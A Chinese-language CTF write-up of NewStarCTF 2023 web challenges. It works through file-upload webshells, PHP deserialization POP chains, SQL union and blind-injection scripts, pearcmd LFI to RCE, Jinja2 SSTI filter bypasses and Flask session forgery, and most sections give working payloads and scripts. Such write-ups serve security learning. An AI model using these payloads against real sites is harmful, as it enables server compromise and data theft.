五一开肝,上学期太摆烂了,打了两周就打不动了,不打了,这次一定要赢回来,会萤的

Web

week1

泄漏的秘密

查看/robots.txt和/www.zip

Begin of Upload

查看前端代码

function validateForm() {
            var fileInput = document.getElementById("file");
            var file = fileInput.files[0];
            var allowedExtensions = ["jpg", "jpeg", "png", "gif"];
            var fileExtension = file.name.split('.').pop().toLowerCase();
            
            if (!file) {
                alert("Please select a file to upload.");
                return false;
            }
            
            if (!allowedExtensions.includes(fileExtension)) {
                alert("错误的拓展名,只允许上传: JPG, JPEG, PNG, GIF");
                return false;
            }
            
            return true;
        }

上传一句话木马
有前端检测,抓个包改一下后缀
可以上传1.jpg,然后抓包改为1.php,访问url/upload/1.php,然后命令执行
或者禁用js(因为是前端的检测),上传php文件

Begin of HTTP

GET: url/?ctf=1
POST: secret=n3wst4rCTF2023g00000d
cookie: power=ctfer
User Agent: NewStarCTF2023
Referer: newstarctf.com
X-Real-IP: 127.0.0.1

ErrorFlask

需要传入number1和number2
url/?number1=1触发debug(相当于number2=null)
查看app.py是计算number1+number2,所以传值不是数字的即可触发debug

Begin of PHP

<?php
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}
md5弱比较
数组绕过
key5作比较时遇字母停止截取
最后一个变量覆盖(extract($_POST);)
url/?key1=EEIZDOI&key2=s214587387a&key4[]=1&key5=2024e
post: key3[]=1&flag5=.

R!C!E!

<?php
highlight_file(__FILE__);
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
    $password=md5($_POST['password']);
    $code=$_POST['e_v.a.l'];
    if(substr($password,0,6)==="c4d038"){
        if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
            eval($code);
        }
    }
}

爆破一下

import hashlib
for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
    if a[0:6] == 'c4d038':
        print(i)
        print(a)
POST: password=114514&e[v.a.l=echo `tac /f*`;

EasyLogin

先注册个普通账户,发现没有用
Ctrl c进入shell,Ctrl d退出shell

爆破一下admin的密码,注意密码是MD5加密的,所以爆破时要加上

修改密码重新发包,发现了302重定向包

week2

游戏高手

查看js文件,搜索score,发现

function gameover() {
  if (gameScore > 100000) {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/api.php', true);
    xhr.setRequestHeader('Content-Type', 'application/json');
    xhr.onreadystatechange = function () {
      if (xhr.readyState === 4 && xhr.status === 200) {
        var response = JSON.parse(xhr.responseText);
        alert(response.message);
      }
    };
    var data = {
      score: gameScore,
    };
    xhr.send(JSON.stringify(data));
  }
  alert('成绩:' + gameScore);
  gameScore = 0;
  curPhase = PHASE_READY;
  hero = null;
  hero = new Hero();
}

控制台传参,gameScore=10000000000
或者使用bp来POST一个json格式的分数,"score":10000000000

POST /api.php HTTP/1.1
Host: 6bdf352d-7431-499b-ad80-22eb7f582878.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
If-Modified-Since: Sun, 26 Mar 2023 07:18:44 GMT
If-None-Match: "2cb-5f7c86fc11d00-gzip"
Content-Length: 27

{
"score":10000000000
}

include 0。0

<?php
highlight_file(__FILE__);
// FLAG in the flag.php
$file = $_GET['file'];
if(isset($file) && !preg_match('/base|rot/i',$file)){
    @include($file);
}else{
    die("nope");
}
?>

base64rot13这两个常见的过滤器被ban了
随便找都一大堆
url/?file=php://filter/read=convert.iconv.utf-8.utf-16/resource=flag.php

ez_sql

union注入
selector过滤,换大写(或者大小写)绕过,#用不了,要换%23

爆字段数
1' union SELECT 1,2,3,4,5%23

爆数据库名(得到 ctf)
1' union SELECT 1,database(),3,4,5%23

(下面用的是我某个比赛的payload)

爆表名,发现or也被过滤了(得到here_is_flag)
1'/**/Union/**/Select/**/1,Group_concat(Table_name),3,4,5/**/From/**/InfoRmation_schema.tables/**/Where/**/Table_schema=database()%23

爆字段名(得到flag)
1'/**/Union/**/Select/**/1,Group_concat(Column_name),3,4,5/**/From/**/InfOrmation_schema.columns/**/Where/**/Table_name='here_is_flag'%23

获取字段内容
1'/**/Union/**/Select/**/1,Group_concat(flag),3,4,5/**/From/**/here_is_flag%23

Unserialize?

 <?php
highlight_file(__FILE__);
// Maybe you need learn some knowledge about deserialize?
class evil {
    private $cmd;

    public function __destruct()
    {
        if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){
            @system($this->cmd);
        }
    }
}

@unserialize($_POST['unser']);
?> 
<?php
class evil
{
    public $cmd;
}
$a = new evil();
// $a->cmd = 'ls /';
$a->cmd = 'ca\t /th1s_1s_fffflllll4444aaaggggg';
echo serialize($a);

Upload again!

这一次是有后端检测机制了,上传jpg文件也不行,说明检测到了文件内容的<?,我们替换为js马,<script language='php'>system('ls');</script>
能上传图片马,但解析不成php文件,这时利用.htaccess解析

<FilesMatch "test">
  SetHandler application/x-httpd-php
</FilesMatch>

这一种采用正则匹配,只要文件名为test的文件都将被作为php文件解析

AddType application/x-httpd-php .jpg

第二种是将.jpg文件都作为php文件解析

所以,我们先上传.htaccess文件,再上传图片马

https://xz.aliyun.com/t/6047?time__1311=n4%2BxnD0DRDgGG%3DNDtG8Dlhje0%3D5I%2BbrOwhGrD&alichlgref=https%3A%2F%2Fcn.bing.com%2F#toc-10
说起这个,我们还有.user.ini文件构成PHP后门

auto_prepend_file=a.jpg

再上传图片马,好像apacha模式下是不可行的,上面的两个方法可用

R!!C!!E!!

git泄露Githack或者git_extract两个好像都是Python2的环境
切换Python2环境(root权限),python GitHack.py url/.git/,三个文件,只有这个有用

// bo0g1pop.php
<?php
highlight_file(__FILE__);
if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {
    if(!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i',$_GET['star'])){
        eval($_GET['star']);
    }
}

无参RCE,很多函数还用不了

参考
https://blog.csdn.net/weixin_53146913/article/details/124133822

/bo0g1pop.php?star=
print_r(getallheaders());  查看请求头
eval(next(getallheaders()));  把命令执行放在UA头
User Agent: system("cat /f*");

week3

Include 🍐

 <?php
    error_reporting(0);
    if(isset($_GET['file'])) {
        $file = $_GET['file'];
        
        if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
            die('hacker!');
        }
        
        include($file.".php");
        # Something in phpinfo.php!
    }
    else {
        highlight_file(__FILE__);
    }
?>

题目的梨pear

phpinfo.php发现register_argc_argv开启,可以利用pearcmd.php实现LFI,也能搜到不少参考文章
https://blog.csdn.net/RABCDXB/article/details/122050370

官方给的参考
https://tttang.com/archive/1312/

在pearcmd.php中&符无发分割参数,真正能分割参数的是+;然后就是利用的命令为config-create,其包括两个参数,一个是绝对路径,还有保存配置文件的文件名;并且第一个参数会被写进到文件里,我们借此实现命令执行
/?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=@eval($_POST[0]);?>+/tmp/cmd.php

/?file=tmp/cmd,也可以直接访问
POST: 0=system('cat /flag');,好像环境有问题,flag读不出来?

要注意php版本不同,pearcmd.php的位置不相同,有的是在/usr/share/pear/pearcmd.php,一般都是在/usr/local/lib/php/pearcmd.php

同时学习过程中还注意到,配置中默认没开启register_argc_argv选项,但我们可以先上传.htaccess(Apache).user.ini来对配置进行覆盖

.htaccess
php_value register_argc_argv On

.user.ini
register_argc_argv=On

medium_sql

sql注入还是挺薄弱的QWQ
下面跟着学习
https://c1oudfl0w0.github.io/blog/2023/10/15/NewStarCTF-2023-Week3/#medium-sql-复现

测试存在布尔盲注

?id=TMP0919'And if(1>0,1,0)%23
?id=TMP0919'And if(0>1,1,0)%23

前者可以返回正常的信息id: TMP0919,后者会返回id not exists,说明页面可以根据if判断的结果回显两种(真假)内容,
因此是布尔盲注
用大小写绕过被过滤的字符

https://www.cnblogs.com/qiushuo/p/17485659.html#medium-level

import requests

url = 'http://d9946033-bc9c-4965-bb87-36c2b370c234.node5.buuoj.cn:81/'
flag = ''
i = 0
j = 0
while True:
    head = 1
    tail = 127
    i += 1
    while head < tail:
        j += 1
        mid = (head + tail) >> 1
        # payload = f"TMP0919' And if(asCii(Substr((Select Group_Concat(table_name) fRom infoRmation_schema.tables wHere tAble_schema=dAtabase()),{i},1))>{mid},1,0)%23"
        # grades,here_is_flag
        # payload=f"TMP0919' And if(asCii(Substr((Select Group_Concat(column_name) fRom infoRmation_schema.columns wHere tAble_name='here_is_flag'),{i},1))>{mid},1,0)%23"
        # flag
        payload = f"TMP0919' And if(asCii(Substr((Select flag fRom here_is_flag),{i},1))>{mid},1,0)%23"
        # 查flag字段
        param = "id=" + payload
        # data = {"id": payload}
        r = requests.get(url, params=param)
        # r = requests.post(url, data=data)
        if "id: TMP0919" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 1:
        flag += chr(head)
        print(flag)
    else:
        break

不是很稳定,多跑几次,不一定完整,但能凑
我突然想起了之前做ctfshow也有类似的题目,脚本是这样的

import requests
url = "http://ff8a57df-2b62-4390-99cb-98273737c05f.challenge.ctf.show/?id='/**/"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'if(ascii(substr(database(),%d,1))>%d,1,0)' % (i, mid)
        # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),{i},1))>{mid},1,0)'
        # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name="flag")),{i},1))>{mid},1,0)'
        payload = f'if(ascii(substr((select/**/(flag)from(flag)),{i},1))>{mid},1,0)'
        r = requests.get(url + payload)
        if "By Rudyard Kipling" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

我是懒狗,其实可以自己改这个二分脚本打,但是摆了摆了
再看看官方

import time
import requests


def condition(res):
    if 'Physics' in res.text:
        return True
    return False


result = ''
_url = 'http://d9946033-bc9c-4965-bb87-36c2b370c234.node5.buuoj.cn:81/'
for _time in range(1, 1000):
    print("time:%d" % (_time))
    left = 32
    right = 128
    while (right > left):
        mid = (left + right) // 2
        # 获取当前库表名
        # url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(table_name))fRom(infOrmation_schema.tables)whEre((tAble_schema) In (dAtabase()))) fRom {_time} FOr 1))))In({mid})),1,0)%23"
        url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(flag)fRom(here_is_flag)) fRom {_time} FOr 1))))In({mid})),1,0)%23"
        # 获取字段名
        # url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(column_name))fRom(infOrmation_schema.columns)whEre((tAble_name) In ('here_is_flag'))) fRom {_time} FOr 1))))In({mid})),1,0)%23"
        # 获取字段值
        time.sleep(0.2)
        res = requests.get(url=url)
        if (condition(res)):
            result += chr(mid)
            print(result)
            break
        else:
            # 获取当前库表名
            # url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(table_name))fRom(infOrmation_schema.tables)whEre((tAble_schema) In (dAtabase()))) fRom {_time} FOr 1))))>({mid})),1,0)%23"
            # 获取字段名
            # url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(column_name))fRom(infOrmation_schema.columns)whEre((tAble_name) In ('here_is_flag'))) fRom {_time} FOr 1))))>({mid})),1,0)%23"
            # 获取字段值
            url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(flag)fRom(here_is_flag)) fRom {_time} FOr 1))))>({mid})),1,0)%23"
            res = requests.get(url=url)
            if (condition(res)):
                left = mid
            else:
                right = mid

呜呼呼,会套脚本终究是一时的,真的懂原理,会转化为脚本才是坚的(粤语读法)QWQ

POP Gadget

 <?php
highlight_file(__FILE__);

class Begin{
    public $name;

    public function __destruct()
    {
        if(preg_match("/[a-zA-Z0-9]/",$this->name)){
            echo "Hello";
        }else{
            echo "Welcome to NewStarCTF 2023!";
        }
    }
}

class Then{
    private $func;

    public function __toString()
    {
        ($this->func)();
        return "Good Job!";
    }

}

class Handle{
    protected $obj;

    public function __call($func, $vars)
    {
        $this->obj->end();
    }

}

class Super{
    protected $obj;
    public function __invoke()
    {
        $this->obj->getStr();
    }

    public function end()
    {
        die("==GAME OVER==");
    }
}

class CTF{
    public $handle;

    public function end()
    {
        unset($this->handle->log);
    }

}

class WhiteGod{
    public $func;
    public $var;

    public function __unset($var)
    {
        ($this->func)($this->var);    
    }
}

@unserialize($_POST['pop']);

这个pop链挺好写的
Begin::__destruct()->Then::__toString()->Super::__invoke()->Handle::__call()->CTF::end()->WhiteGod::unset()

<?php

   class Begin
   {
       public $name;
   }

   class Then
   {
       public $func;
   }

   class Handle
   {
       public $obj;
   }

   class Super
   {
       public $obj;
   }

   class CTF
   {
       public $handle;
   }

   class WhiteGod
   {
       public $func;
       public $var;
   }

   $a = new Begin();
   $a->name = new Then();
   $a->name->func = new Super();
   $a->name->func->obj = new Handle();
   $a->name->func->obj->obj = new CTF();
   $a->name->func->obj->obj->handle = new WhiteGod();
   $a->name->func->obj->obj->handle->func = 'system';
   $a->name->func->obj->obj->handle->var = 'cat /flag';
   echo serialize($a);

R!!!C!!!E!!!

 <?php
highlight_file(__FILE__);
class minipop{
    public $code;
    public $qwejaskdjnlka;
    public function __toString()
    {
        if(!preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $this->code)){
            exec($this->code);
        }
        return "alright";
    }
    public function __destruct()
    {
        echo $this->qwejaskdjnlka;
    }
}
if(isset($_POST['payload'])){
    //wanna try?
    unserialize($_POST['payload']);
}

好家伙,一开始还想反弹shell,居然把我.给ban了,但是命令执行好像可以搞一手,>的重定向写文件也没了,这里的exec()就相当于常用的system()了,但是它执行是没有回显的,所以要把输出内容写到文件去
使用tee命令,可以把输出内容重定向到文件中,但是被ban,得绕过一下,t''ee双引号绕过(单引号也是可以的)

<?php

   class minipop
   {
       public $code;
       public $qwejaskdjnlka;
   }
   $a = new minipop();
   $b = new minipop();
   $a->qwejaskdjnlka = $b;
   $b->code = "ls / | t''ee 1";
   echo serialize($a);

先post传参进去,后再访问1

<?php

   class minipop
   {
       public $code;
       public $qwejaskdjnlka;
   }
   $a = new minipop();
   $b = new minipop();
   $a->qwejaskdjnlka = $b;
   $b->code = "cat /flag_is_h3eeere | t''ee 2";
   echo serialize($a);

同理访问2,官方给的预期解是bash盲注,怎么看大家都非预期,是给了写入权限吧
没有写入权限就比较麻烦了,只能通过sleep命令根据执行时间来进行盲注
可以参考这个
https://johnfrod.top/ctf/命令注入之盲注/

import time
import requests

url = "http://547ff780-ad61-4956-b606-ebb9e30e5e52.node5.buuoj.cn:81/"
result = ""
for i in range(1, 15):
    for j in range(1, 50):
        # ascii码表
        for k in range(32, 127):
            k = chr(k)
            payload = f"if [ `cat /flag_is_h3eeere | awk NR=={i} | cut -c {j}` == {k} ];then sleep 2;fi"
            length = len(payload)
            payload2 = {"payload": 'O: 7: "minipop": 2: {{s: 4: "code"; N; s: 13: "qwejaskdjnlka";O:7:"minipop":2:{{s:4:"code";s:{0}:"{1}";s:13:"qwejaskdjnlka";N; }}}}'.format(
                length, payload)}
            t1 = time.time()
            r = requests.post(url=url, data=payload2)
            t2 = time.time()
            if t2-t1 > 1.5:
                result += k
                print(result)
    result += " "

byd,这官方脚本挺难跑的,跑几次都没见有输出

GenShin

分析网络,响应头发现,Pop: /secr3tofpop
传参name=,反应过来的已经知道是SSTI了,是吧,这个传参就挺眼熟的,而且传什么得到什么

部分字符串被过滤了,'、{{}}、popen、init、request
{{}}用{% %}绕过,字符串还可以拼接,单引号就用双引号绕过
这里没有出现回显,打印一下
print("".__class__.__bases__[0].__subclasses__())  然后自己查找<class 'os._wrap_close'>的位置

{%print(""["__cla"+"ss__"]["__ba"+"ses__"][0]["__subcl"+"asses__"]()[132]["__in"+"it__"]["__glob"+"als__"]["pop"+"en"]("cat /flag")["read"]())%}
就拼接init也可以的

其实,init可以用enter绕过
{%print("".__class__.__bases__[0].__subclasses__()[132].__enter__.__globals__["pop"+"en"]("cat /flag").read())%}

官方利用内置的全局函数
{% print(get_flashed_messages.__globals__.os["pop"+"en"]("cat /flag").read()) %}

可以参考
https://tyskill.github.io/posts/flaskssti/

OtenkiGirl()

有个hint.txt

『「routes」フォルダーだけを見てください。SQLインジェクションはありません。』と御坂御坂は期待に満ちた気持ちで言った。

“只看'routes'文件夹,没有SQL注入。” 御坂御坂满怀期待地说道。

js原型链污染,待补ing……

week4

 <?php
highlight_file(__FILE__);
function waf($str){
    return str_replace("bad","good",$str);
}

class GetFlag {
    public $key;
    public $cmd = "whoami";
    public function __construct($key)
    {
        $this->key = $key;
    }
    public function __destruct()
    {
        system($this->cmd);
    }
}

unserialize(waf(serialize(new GetFlag($_GET['key'])))); www-data www-data

想到了PHP反序列化字符逃逸
这里是替换修改后导致序列化字符串变长

我们需要的是

O:7:"GetFlag":2:{s:3:"key";s:n:"str";s:3:"cmd";s:9:"cat /flag";}"s:3:"cmd";s:6:"whoami";}

只要key的长度刚刚好覆盖到s:3:"cmd";s:6:"whoami";}的前面,那么"s:3:"cmd";s:6:"whoami";}将会被丢弃,不起作用

也就是说,key需要传的是str";s:3:"cmd";s:9:"cat /flag";}

key每传入一个bad,经过waf以后,我们就可以使得它的值增加一个长度供我们的逃逸字符使用,从而使得我们逃逸的字符向后挪,不再属于key的范围

所以,一个bad增加一个逃逸字符,需要逃逸的字符是";s:3:"cmd";s:9:"cat /flag";},共29个,需要29个bad

payload: badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:9:"cat /flag";}

More Fast

 <?php
highlight_file(__FILE__);

class Start{
    public $errMsg;
    public function __destruct() {
        die($this->errMsg);
    }
}

class Pwn{
    public $obj;
    public function __invoke(){
        $this->obj->evil();
    }
    public function evil() {
        phpinfo();
    }
}

class Reverse{
    public $func;
    public function __get($var) {
        ($this->func)();
    }
}

class Web{
    public $func;
    public $var;
    public function evil() {
        if(!preg_match("/flag/i",$this->var)){
            ($this->func)($this->var);
        }else{
            echo "Not Flag";
        }
    }
}

class Crypto{
    public $obj;
    public function __toString() {
        $wel = $this->obj->good;
        return "NewStar";
    }
}

class Misc{
    public function evil() {
        echo "good job but nothing";
    }
}

$a = @unserialize($_POST['fast']);
throw new Exception("Nope");

PHP GC垃圾回收机制
https://xz.aliyun.com/t/11843?time__1311=mqmx0DBD9DyD2QKD%2FQbyqQqGKprwQC0CeD&alichlgref=https%3A%2F%2Fcn.bing.com%2F#toc-0

一开始卡了一下下,我还在想怎么触发Crypto::__toString(),其实Start()::__destruct()是可以利用的,die()是会输出信息的,我有点忘记了

链子:Start::__destruct()->Crypto::__toString()->Reverse::__get()->Pwn::__invoke()->Web::evil()

<?php

   class Start
   {
       public $errMsg;
   }

   class Pwn
   {
       public $obj;
   }

   class Reverse
   {
       public $func;
   }

   class Web
   {
       public $func = "system";
       public $var = "cat /f*";
   }

   class Crypto
   {
       public $obj;
   }

   $a = new Start();
   $a->errMsg = new Crypto();
   $a->errMsg->obj = new Reverse();
   $a->errMsg->obj->func = new Pwn();
   $a->errMsg->obj->func->obj = new Web();
   echo serialize(array($a, 0));
   # a:2:{i:0;O:5:"Start":1:{s:6:"errMsg";O:6:"Crypto":1:{s:3:"obj";O:7:"Reverse":1:{s:4:"func";O:3:"Pwn":1:{s:3:"obj";O:3:"Web":2:{s:4:"func";s:6:"system";s:3:"var";s:7:"cat /f*";}}}}}i:1;i:0;}

最终payload,a:2:{i:0;O:5:"Start":1:{s:6:"errMsg";O:6:"Crypto":1:{s:3:"obj";O:7:"Reverse":1:{s:4:"func";O:3:"Pwn":1:{s:3:"obj";O:3:"Web":2:{s:4:"func";s:6:"system";s:3:"var";s:7:"cat /f*";}}}}}i:0;i:0;}

midsql

输入空格

fuzz一下发现没有过滤其他字符,空格可以用/**/代替

说明页面没有回显是吧
可以借助sleep()函数进行时间盲注
大佬脚本
https://iahzl.github.io/NewStar2023-WriteUp-Week4/#midsql

import time
import requests

result = ''
last = ' '

for i in range(1, 1000):
    for j in range(127, 31, -1):
        url = 'http://f382fcdc-7812-48b9-b46f-74da5cf9ed13.node5.buuoj.cn:81/?id='
        # payload = f'1/**/and/**/if((ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))>{j}),sleep(3),0)' # information_schema,mysql,performance_schema,sys,test,ctf
        # payload = f'1/**/and/**/if((ascii(substr((select/**/database()),{i},1))>{j}),sleep(3),0)'
        # payload = f'1/**/and/**/if((ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/"ctf"),{i},1))>{j}),sleep(3),0)'
        # payload = f'1/**/and/**/if((ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/"items"),{i},1))>{j}),sleep(3),0)' # id,name,price
        # payload = f'1/**/and/**/if((ascii(substr((select/**/group_concat(price)/**/from/**/ctf.items),{i},1))>{j}),sleep(3),0)'
        # payload = f'1/**/and/**/if((ascii(substr((select/**/group_concat(id,0x3a,name,0x3a,price)/**/from/**/ctf.items),{i},1))>{j}),sleep(3),0)'
        payload = f'1/**/and/**/if((ascii(substr((select/**/group_concat(name)/**/from/**/ctf.items),{i},1))>{j}),sleep(3),0)'
        url = url + payload
        # print(url)
        start_time = time.time()
        response = requests.get(url=url)
        end_time = time.time()
        if (end_time - start_time) > 3:
            last = result
            result += chr(j + 1)
            break
    print(result)

可以学习一下
https://www.cnblogs.com/qiushuo/p/17485659.html#时间盲注

flask disk

点击admin manage

看到这个,我想起了之前遇到过flask pin(题目是要计算pin码,进入控制台实现命令执行),这里开启了debug模式

参考学习
https://blog.lxscloud.top/2022/10/09/CTF中Python_Flask应用的一些解题方法总结/
注意到我们这里是可以进行文件上传的

官方如是说

flask开启了debug模式下,app.py源文件被修改后会立刻加载

所以只需要上传一个能rce的app.py文件把原来的覆盖,就可以了
注意语法不能出错,否则会崩溃

上传app.py

from flask import Flask,request
import os
app = Flask(__name__)
@app.route('/')
def index():
    try:
        cmd = request.args.get('cmd')
        date = os.popen(cmd).read()
        return date
    except:
        pass

    return "1"
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=5000,debug=True)

url/?cmd=cat /flag,拿到flag

InjectMe

附件

FROM vulhub/flask:1.1.1
ENV FLAG=flag{not_here}
COPY src/ /app
RUN mv /app/start.sh /start.sh && chmod 777 /start.sh
CMD [ "/start.sh" ]
EXPOSE 8080

flask框架,泄露了目录./app

双击图片你会发现

woc,崩铁,饮月和符玄,好评,他喵的还有最后一课,这也要刀我?

有源码泄露
我们试着下载文件app.py,发现../被替换成空,这种情况我们直接双写绕过,..././是可以替换成../的,url/download?file=..././..././..././..././..././app/app.py
/etc/passwd,没什么东西

app.py

import os
import re

from flask import Flask, render_template, request, abort, send_file, session, render_template_string
from config import secret_key

app = Flask(__name__)
app.secret_key = secret_key


@app.route('/')
def hello_world():  # put application's code here
    return render_template('index.html')


@app.route("/cancanneed", methods=["GET"])
def cancanneed():
    all_filename = os.listdir('./static/img/')
    filename = request.args.get('file', '')
    if filename:
        return render_template('img.html', filename=filename, all_filename=all_filename)
    else:
        return f"{str(os.listdir('./static/img/'))} <br> <a href=\"/cancanneed?file=1.jpg\">/cancanneed?file=1.jpg</a>"


@app.route("/download", methods=["GET"])
def download():
    filename = request.args.get('file', '')
    if filename:
        filename = filename.replace('../', '')
        filename = os.path.join('static/img/', filename)
        print(filename)
        if (os.path.exists(filename)) and ("start" not in filename):
            return send_file(filename)
        else:
            abort(500)
    else:
        abort(404)


@app.route('/backdoor', methods=["GET"])
def backdoor():
    try:
        print(session.get("user"))
        if session.get("user") is None:
            session['user'] = "guest"
        name = session.get("user")
        if re.findall(
                r'__|{{|class|base|init|mro|subclasses|builtins|globals|flag|os|system|popen|eval|:|\+|request|cat|tac|base64|nl|hex|\\u|\\x|\.',
                name):
            abort(500)
        else:
            return render_template_string(
                '竟然给<h1>%s</h1>你找到了我的后门,你一定是网络安全大赛冠军吧!😝 <br> 那么 现在轮到你了!<br> 最后祝您玩得愉快!😁' % name)
    except Exception:
        abort(500)


@app.errorhandler(404)
def page_not_find(e):
    return render_template('404.html'), 404


@app.errorhandler(500)
def internal_server_error(e):
    return render_template('500.html'), 500


if __name__ == '__main__':
    app.run('0.0.0.0', port=8080)

主要是这一段

@app.route('/backdoor', methods=["GET"])
def backdoor():
    try:
        print(session.get("user"))
        if session.get("user") is None:
            session['user'] = "guest"
        name = session.get("user")
        if re.findall(
                r'__|{{|class|base|init|mro|subclasses|builtins|globals|flag|os|system|popen|eval|:|\+|request|cat|tac|base64|nl|hex|\\u|\\x|\.',
                name):
            abort(500)
        else:
            return render_template_string(
                '竟然给<h1>%s</h1>你找到了我的后门,你一定是网络安全大赛冠军吧!😝 <br> 那么 现在轮到你了!<br> 最后祝您玩得愉快!😁' % name)
    except Exception:
        abort(500)

根据这个正则表达式匹配,是要检测SSTI模板注入,但是过滤了好多啊,这种就要靠编码来进行绕过了,想起了unicode绕过,但是也过滤了\\u,十六进制\\x,我们还可以选择八进制

常见的绕过(这里没有八进制)
https://www.cnblogs.com/2ha0yuk7on/p/16648850.html#常规绕过姿势

狼组安全团队公开知识库
https://wiki.wgpsec.org/knowledge/ctf/SSTI.html

还要注意/backdoor路由要获取sessionuser值(name)
我们的payload会从session中来,想到session伪造
但是,session伪造是一定需要key

根据源码,secret_keyconfig.py里,我们可以访问下载得到key
url/download?file=..././..././..././..././..././app/config.py
得到secret_key = "y0u_n3ver_k0nw_s3cret_key_1s_newst4r"

访问/backdoor,在cookie拿到session

https://github.com/noraj/flask-session-cookie-manager
该文件夹下打开终端
python3 flask_session_cookie_manager3.py decode -s "y0u_n3ver_k0nw_s3cret_key_1s_newst4r" -c "eyJ1c2VyIjoiZ3Vlc3QifQ.Zj0JOw.aKlUzYl9rKnyJzQisZuj9pDeJLE"

user值进行SSTI模板注入
此脚本(大佬改动官方脚本)来自
https://iahzl.github.io/NewStar2023-WriteUp-Week4/#InjectMe
也可以手动编码,更改session值(一开始我拿官方的payload进行编码,好像没打出来?奇怪了)

因为我是终端执行py文件,所以flask-session-cookie-manager3.py需要放在文件夹C:\Users\name

import re
import requests
import subprocess


# 把这个下载了,需要使用里面的flask-session-cookie-manager3.py
# https://github.com/noraj/flask-session-cookie-manager
def string_to_octal_ascii(s):
    octal_ascii = ""
    for char in s:
        char_code = ord(char)
        octal_ascii += "\\\\" + format(char_code, '03o')
    # octal_ascii += "\\\\" + format(char_code, 'o')
    return octal_ascii


secret_key = "y0u_n3ver_k0nw_s3cret_key_1s_newst4r"
# payload = "{%print(7*7)%}"
# payload = "{%print(\"\"\\\\u005f\\\\u005f\"\")%}"
# payload = "{%print(\"\"\\\\x5f\\\\x5f\"\")%}"
eval_shell = "\"\"" + \
    string_to_octal_ascii(
        "__import__(\"os\").popen(\"cat /*\").read()") + "\"\""
print(eval_shell)
# docker部署&windows运行payload
# {{x.__init__.__globals__.__builtins__.eval('__import__("os").popen("dir").read()')}}
payload = "{{%print(xxx|attr(\"\"\\\\137\\\\137\\\\151\\\\156\\\\151\\\\164\\\\137\\\\137\"\")|attr(\"\"\\\\137\\\\137\\\\147\\\\154\\\\157\\\\142\\\\141\\\\154\\\\163\\\\137\\\\137\"\")|attr(\"\"\\\\137\\\\137\\\\147\\\\145\\\\164\\\\151\\\\164\\\\145\\\\155\\\\137\\\\137\"\")(\"\"\\\\137\\\\137\\\\142\\\\165\\\\151\\\\154\\\\164\\\\151\\\\156\\\\163\\\\137\\\\137\"\")|attr(\"\"\\\\137\\\\137\\\\147\\\\145\\\\164\\\\151\\\\164\\\\145\\\\155\\\\137\\\\137\"\")(\"\"\\\\145\\\\166\\\\141\\\\154\"\")({0}))%}}".format(eval_shell)
print(payload)
command = "D:\\Python\\Python3.11\\python.exe flask_session_cookie_manager3.py encode -s \"{0}\" -t \"{{'user':'{1}'}}\"".format(
    secret_key, payload)
print(command)
session_data = subprocess.check_output(command, shell=True)
print(session_data)
